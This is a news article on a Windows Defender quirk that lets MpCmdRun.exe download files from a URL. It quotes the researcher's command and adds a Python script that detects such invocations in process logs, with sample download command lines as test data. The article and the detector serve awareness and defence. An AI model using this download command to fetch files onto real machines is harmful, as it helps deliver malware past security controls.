Windows Defender Bug Surprisingly Allows Directly Downloaded Malware Into Windows
They say with great power comes great responsibility, and you would think Windows Defender would be incredibly responsible -- at least when it comes to security. As it turns out, however, Windows Defender shared its “great power” by allowing its command line utility to download potentially malicious files to a Windows
Windows Defender, the basic malware protection on any modern Windows PC, also comes packed with another handy feature: a command line interface. The “MpCmdRun.exe” (Microsoft Protection CMD) utility exposes security features through the command line. Users can scan, trace, and tinker with a variety of commands. Now, in an update to Windows Defender, security researcher Askar Mohammad discovered that files can be downloaded with the -DownloadFile argument and a URL to accompany it.
You can use C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path> to download your file using Windows defender itself.
— Askar (@mohammadaskar2) September 2, 2020
This functionality allows a local user to download a file. In theory, however, Windows Defender, and hopefully other antivirus software packages, should detect malware and remove it. No matter what, this is just another vulnerability that could be exploited and that people need to watch out for.
Ultimately, it is rather interesting that something like this was discovered. One would think that a defender would not normally allow an attacker through the front gate. In any case, this is a healthy reminder to make sure your network ports are secure and unwanted downloads are blocked while upholding any "great responsibility."
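For defenders, the invocation described above is visible in process-creation logging. The following is an added example, not code from the article or from Microsoft: a small Python detector that flags MpCmdRun.exe command lines carrying the -DownloadFile, -url and -path switches and extracts the URL and destination for triage. It assumes command lines have already been exported as strings (for example from Sysmon Event ID 1 or Security event 4688 with command-line auditing); the sample lines, the `inspect` and `scan` helper names, and the example.test URLs are constructed for illustration.

```python
import ntpath
import re

# Constructed process-creation command lines (not from the article).
SAMPLE_EVENTS = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    r'"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe" '
    r'-DownloadFile -url https://files.example.test/a.bin -path C:\Users\Public\a.bin',
    r'mpcmdrun.exe -DOWNLOADFILE -URL "https://files.example.test/b.bin" -PATH "C:\Temp\b b.bin"',
    r'C:\Windows\System32\cmd.exe /c echo MpCmdRun.exe -DownloadFile',
]

# A token is either a double-quoted run (may contain spaces) or a run of non-spaces.
TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line into tokens, dropping surrounding quotes."""
    return [t.strip('"') for t in TOKEN.findall(cmdline)]


def inspect(cmdline):
    """Return {'image', 'url', 'path'} if MpCmdRun.exe is asked to download, else None."""
    tokens = tokenize(cmdline)
    # Match on the executable itself, not on a substring of the whole line,
    # so that e.g. "cmd.exe /c echo MpCmdRun.exe ..." is not flagged.
    if not tokens or ntpath.basename(tokens[0]).lower() != "mpcmdrun.exe":
        return None
    switches = {}
    for pos, tok in enumerate(tokens[1:], start=1):
        if tok.startswith("-"):
            nxt = tokens[pos + 1] if pos + 1 < len(tokens) else None
            has_value = nxt is not None and not nxt.startswith("-")
            switches[tok[1:].lower()] = nxt if has_value else None  # case-insensitive
    # The article names -DownloadFile; the quoted tweet shows only -url and -path.
    if "downloadfile" not in switches and "url" not in switches:
        return None
    return {"image": tokens[0], "url": switches.get("url"), "path": switches.get("path")}


def scan(events):
    """Return (index, finding) pairs for every event that requests a download."""
    hits = [(i, inspect(e)) for i, e in enumerate(events)]
    return [(i, f) for i, f in hits if f is not None]


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(f"event {index}: {finding['url']} -> {finding['path']}")
```
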